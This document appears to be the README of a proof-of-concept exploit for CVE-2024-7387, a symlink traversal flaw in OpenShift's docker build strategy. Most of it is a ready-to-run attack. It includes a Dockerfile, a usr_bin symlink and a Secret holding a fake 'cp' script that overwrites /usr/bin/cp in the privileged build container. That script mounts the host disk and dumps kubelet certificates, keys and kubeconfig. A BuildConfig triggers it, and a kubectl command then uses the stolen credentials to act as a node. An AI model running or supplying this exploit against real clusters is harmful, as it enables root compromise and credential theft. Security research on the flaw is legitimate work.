CVE-2024-7387 PoC — Openshift/builder: path traversal allows command injection in privileged buildcontainer using docker build strategy

Source

Associated Vulnerability

Description

overwrites system binaries allowing priv esc from dev to worker node

Readme

### overview

[cve-2024-7387](https://nvd.nist.gov/vuln/detail/CVE-2024-7387) is a symlink traversal vulnerability in openshift's docker build strategy that allows attackers to overwrite system binaries in privileged build containers. by mounting a secret to a symbolic link pointing to `/usr/bin`, malicious files can replace legitimate system commands like `cp`. when openshift internally uses these compromised binaries during the build process, arbitrary code executes with root privileges, enabling full cluster compromise through kubelet certificate extraction.

### poc

clone the repository containing the vulnerable configuration:

```shell
git clone https://github.com/0xSigSegv0x00/cve-2024-7387.git
cd cve-2024-7387
```

the repository contains a `Dockerfile` that copies the build context, lists its contents, & displays the payload output:

```Dockerfile
FROM fedora:latest
COPY . .
RUN ls -la && cat pwn.txt
```

>in openshift's docker build strategy, the build context is mounted at `/tmp/build/inputs/` inside the privileged build container. `COPY . .` copies everything from this location into the image.

it also includes a symbolic link `usr_bin` pointing to `/usr/bin`, which will be exploited to overwrite system binaries.

create a secret containing the malicious bash payload named `cp`:

```yaml
# privesc-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: privesc-secret
stringData:
  # creates a file named `cp` that runs inside a privileged container
  cp: |
    #!/bin/bash
    
    {
      echo "USER:"
      whoami                                                                                                 # checks if we are `root` in container   
      echo -e "\nDEVICES:"
      ls -la /dev/vd*                                                                                        # lists storage devices accessible from privileged container  
      echo -e "\nCAPABILITIES:"
      cat /proc/self/status | grep Cap                                                                       # shows container capabilities & permissions     
      echo -e "\nMOUNTS:"
      mount                                                                                                  # identifies filesystems currently mounted    
      echo -e "\nHOST MOUNT:"
      mkdir -p /mnt/h                                                                                        # creates a directory to mount the host disk
      mount /dev/vda4 /mnt/h 2>&1                                                                            # mounts the cluster host's drive   
      echo -e "\nKUBELET DIRECTORY:"
      ls -la /mnt/h/ostree/deploy/fedora-coreos/var/lib/kubelet/pki/                                         # lists kubelet certificates
      echo -e "\nKUBELET CLIENT CERTIFICATE & KEY:"
      cat $(ls -t /mnt/h/ostree/deploy/fedora-coreos/var/lib/kubelet/pki/kubelet-client-*.pem 2>/dev/null \  # outputs the most recent kubelet client cert & key
      | head -1)                         
      echo -e "\nKUBELET KUBECONFIG:"
      cat /mnt/h/ostree/deploy/fedora-coreos/var/lib/kubelet/kubeconfig 2>&1                                 # retrieves API server address & CA certificate
    } > /tmp/build/inputs/pwn.txt 2>&1

    exit 0
type: Opaque
```

apply the secret:

```bash
oc apply -f privesc-secret.yaml
```

>the `cp` key in the secret will create a file named `cp`. when mounted via `destinationDir: usr_bin` (a symlink to `/usr/bin`), this file overwrites the legitimate `/usr/bin/cp binary` with the malicious script.

create a trigger secret:

```yaml
# trigger-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: trigger-secret
stringData:
  trigger: pwned
type: Opaque
```

apply the trigger secret:

```bash
oc apply -f trigger-secret.yaml
```

>the secret will trigger openshift to use the `cp` command internally when mounting it, executing the malicious payload.

create the `BuildConfig` that mounts both secrets:

```shell
# malicious-build-config.yaml
kind: BuildConfig
apiVersion: build.openshift.io/v1
metadata:
  name: malicious-build-config
spec:
  nodeSelector: null
  strategy:
    type: Docker
    dockerStrategy:
      dockerfilePath: Dockerfile
  source:
    type: Git
    git:
      uri: 'https://github.com/0xSigSegv0x00/cve-2024-7387.git'
      ref: main
    contextDir: /
    secrets:
      - secret:
          name: privesc-secret  # mounts to symlink path
        destinationDir: usr_bin
      - secret:
          name: trigger-secret  # mounts to root of build context
```

>the `destinationDir: usr_bin` mounts the secret at `/tmp/build/inputs/usr_bin` & since `usr_bin` is a symlink to `/usr/bin`, the secret's `cp` file overwrites `/usr/bin/cp`. the trigger-secret mounts to the build context root, & when openshift copies it using the `cp` command, the malicious `/usr/bin/cp` script executes instead.

apply the build configuration:

```bash
oc apply -f malicious-build-config.yaml
```

start the build to execute the payload:

```shell
oc start-build malicious-build-config
```

check the build logs to verify the payload executed:

```shell
oc logs -f build/malicious-build-config-1
```

>the contents of `pwn.txt` displayed in the build logs confirm the malicious script executed successfully.

save the kubelet certificate & key to local files, then verify cluster access as `system:node:worker1`:

```shell
kubectl --client-certificate=kubelet-client.pem --client-key=kubelet-client.key --server=https://api-int.okd4.lab.lan:6443 --insecure-skip-tls-verify get nodes
```

File Snapshot

 [4.0K]  /data/pocs/e25b2ba7f49abd8cf9f19359550b790964357849
├── [  53]  Dockerfile
├── [5.4K]  README.md
└── [   8]  usr_bin -> /usr/bin

1 directory, 2 files

Remarks